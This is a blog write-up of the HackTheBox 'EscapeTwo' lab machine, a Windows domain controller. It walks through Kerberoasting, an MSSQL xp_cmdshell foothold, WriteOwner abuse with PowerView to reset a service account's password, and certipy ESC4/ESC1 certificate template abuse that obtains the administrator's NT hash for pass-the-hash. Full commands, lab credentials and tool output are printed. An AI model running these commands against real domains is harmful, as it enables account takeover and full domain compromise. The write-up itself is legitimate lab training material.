Destinys Blog

EscapeTwo - HackTheBox.com

7 min read

Machine NameDifficultyDate StartedDate Completed
EscapeTwoEasy13/01/202513/01/2025

Learning Points :

  • Exploiting WriteOwner Permission

Attack Path:

  1. Enumerate SMB shares and find compressed .xlsx files.
  2. Extract the files and find the password for the sa user, which can be used to log into MSSQL.
  3. Log into MSSQL, enable xp_cmdshell, and get a reverse shell.
  4. Enumerate and find the password for the ryan user, log in using Evil-WinRM, and obtain the user flag.
  5. Enumerate BloodHound data and discover that ryan has WriteOwner access to the ca_svc account.
  6. Abuse this permission to gain full control of the ca_svc account and change the user’s password.
  7. Find a vulnerable certificate from ca_svc and identify an ESC4-vulnerable template.
  8. Exploit the vulnerability and modify the template to make it ESC1-vulnerable.
  9. Use the vulnerable certificate to impersonate the administrator by exploiting both the ESC4 and ESC1 vulnerabilities, obtaining the administrator’s hash.
  10. Use impacket-psexec to get a shell as NT AUTHORITY\SYSTEM and retrieve the root flag.

Activity Log:

  • Ran a BloodHound Python scan using provided credentials.
  • Identified two kerberoastable users from BloodHound data.
  • Used impacket-GetUserSPNs to request hashes and was successful.
  • Attempted to crack the hash with Hashcat but failed.
  • Tried enumerating certificates using the Rose user but found nothing.
  • Enumerated BloodHound for more interesting paths.
  • Enumerated SMB shares and found a readable share named “Accounting Department.”
  • Downloaded two .xlsx files from the share, but they appeared corrupted in LibreOffice.
  • Extracted the .xlsx files using Archive Manager and found credentials.
  • Checked the users using SMB and found the oscar user to be valid.
  • Logged into MSSQL using sa credentials and enabled xp_cmdshell.
  • Executed a reverse shell and got a shell as sequel\sql_svc.
  • Found the credentials for user ryan and used password spray to confirm login.
  • Obtained the user flag from the ryan account.
  • Privilege escalation: Found that ryan had WriteOwner permission to ca_svc user.
  • Used PowerView module to change the ownership of ca_svc to ryan.
  • Granted ryan full control permissions over the ca_svc account.
  • Changed the password of the ca_svc account to 'Password9999'.
  • Used certipy-ad to search for vulnerable certificate templates for ca_svc.
  • Identified the DunderMifflinAuthentication template as vulnerable to ESC4.
  • Modified the template configuration to allow domain users to enroll and exploit ESC1.
  • Requested the vulnerable certificate, impersonating the administrator user.

Default Nmap scan :

# Nmap 7.94SVN scan initiated Sun Jan 12 21:23:57 2025 as: /usr/lib/nmap/nmap -sC -sV -Pn -oA default 10.10.11.51
Nmap scan report for 10.10.11.51
Host is up (0.33s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-01-12 15:54:24Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
|_ssl-date: 2025-01-12T15:55:46+00:00; -1s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
|_ssl-date: 2025-01-12T15:55:46+00:00; 0s from scanner time.
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info: 
|   10.10.11.51:1433: 
|     Target_Name: SEQUEL
|     NetBIOS_Domain_Name: SEQUEL
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: sequel.htb
|     DNS_Computer_Name: DC01.sequel.htb
|     DNS_Tree_Name: sequel.htb
|_    Product_Version: 10.0.17763
| ms-sql-info: 
|   10.10.11.51:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
|_ssl-date: 2025-01-12T15:55:46+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-01-12T14:55:49
|_Not valid after:  2055-01-12T14:55:49
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-12T15:55:46+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
|_ssl-date: 2025-01-12T15:55:46+00:00; 0s from scanner time.
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-01-12T15:55:07
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jan 12 21:25:56 2025 -- 1 IP address (1 host up) scanned in 119.00 seconds

Since this was an assumed breach scenario, we were provided with low-level credentials.

10.10.11.51 -u rose -p KxEPkKe6R8su

We ran a BloodHound Python scan using the credentials we had.

From the BloodHound data, we were able to see that two users were kerberoastable.

Used impacket-GetUserSPNs to request the hashes and was successful.

impacket-GetUserSPNs -dc-ip 10.10.11.51 SEQUEL.HTB/rose -request

Tried to crack it using Hashcat but failed.

Tried enumerating certificates using the Rose user but couldn’t find anything.

certipy-ad find -u 'ROSE'@SEQUEL.HTB -p KxEPkKe6R8su -dc-ip 10.10.11.51 -stdout -vulnerable

Enumerated BloodHound for more interesting paths.

Enumerated SMB shares and was able to see a readable share named “Accounting Department.”

Found two .xlsx files and downloaded them to Eagle.

Opening the files using LibreOffice gave us corrupted files.

Using the Archive Manager, we were able to extract the .xlsx files.

While enumerating the files, we were able to find credentials.

angela::0fwz7Q4mSpurIt99
oscar:oscar@sequel.htb:86LxLBMgEWaKUnBG
kevin:kevin@sequel.htb:Md9Wlq1E5bZnVDVo
sa:sa@sequel.htb:MSSQLP@ssw0rd!

Checked the users using SMB and was able to see that only the oscar user was valid.

oscar:86LxLBMgEWaKUnBG

The credentials of the user sa worked to log in to MSSQL.

Enabled the xp_cmdshell using the command enable_xp_cmdshell and was able to execute system commands.

Got a shell on the machine as sequel\sql_svc after executing a reverse shell.

While enumerating, we found a credential.

Using a password spray, we confirmed that it was the user ryan’s password, logged into the machine, and obtained the user flag.

Privilege Escalation

Looking at the BloodHound graph, the user ryan had WriteOwner permission to the ca_svc user.

Imported the PowerView module

Import-Module .\PowerView.ps1

Changed the ownership of the ca_svc account to the user ryan.

Set-DomainObjectOwner -Identity 'ca_svc' -OwnerIdentity 'ryan'

Granted full control permissions (All rights) to ryan over the ca_svc account.

Add-DomainObjectAcl -Rights 'All' -TargetIdentity "ca_svc" -PrincipalIdentity "ryan"

Changed the password of the ca_svc account to 'Password9999'.

$NewPassword = ConvertTo-SecureString 'Password9999' -AsPlainText -Force  

Set-DomainUserPassword -Identity 'ca_svc' -AccountPassword $NewPassword

We used certipy-ad to search for vulnerable certificate templates for the ca_svc user on the SEQUEL.HTB domain and were able to see that the template DunderMifflinAuthentication was vulnerable to ESC4.

certipy-ad find -u 'ca_svc'@SEQUEL.HTB -p Password9999 -dc-ip 10.10.11.51 -stdout -vulnerable

Using Certipy, we modified the configuration of this template to allow domain users to enroll for it and impersonate any user so that we can exploit it using the ESC1.

root@eagle:~/HTB/Seasonal/Windows/EscapeTwo# certipy-ad template -u ca_svc -target sequel.vl -dc-ip 10.10.11.51 -template DunderMifflinAuthentication
Certipy v4.8.2 - by Oliver Lyak (ly4k)

Password:
[*] Updating certificate template 'DunderMifflinAuthentication'
[*] Successfully updated 'DunderMifflinAuthentication'

Now, we were able to exploit this as an ESC1 certificate vulnerability.

We requested the vulnerable certificate, impersonating the administrator user.

root@eagle:~/HTB/Seasonal/Windows/EscapeTwo/cert# certipy-ad req -u 'ca_svc' -p Password9999 -dc-ip 10.10.11.51 -ca sequel-DC01-CA -template DunderMifflinAuthentication -upn administrator -target dc01.sequel.vl -key-size 4096
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 30
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

Then, we were able to request the administrator’s hash using the exported certificate.

root@eagle:~/HTB/Seasonal/Windows/EscapeTwo/cert# certipy-ad auth -pfx 'administrator.pfx' -username 'administrator' -domain 'sequel.htb' -dc-ip 10.10.11.51
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed4060f75e5a0b3ff

We were able to perform a pass-the-hash attack using Evil-WinRM, log into the machine, and obtain the root flag.

Graph View

Backlinks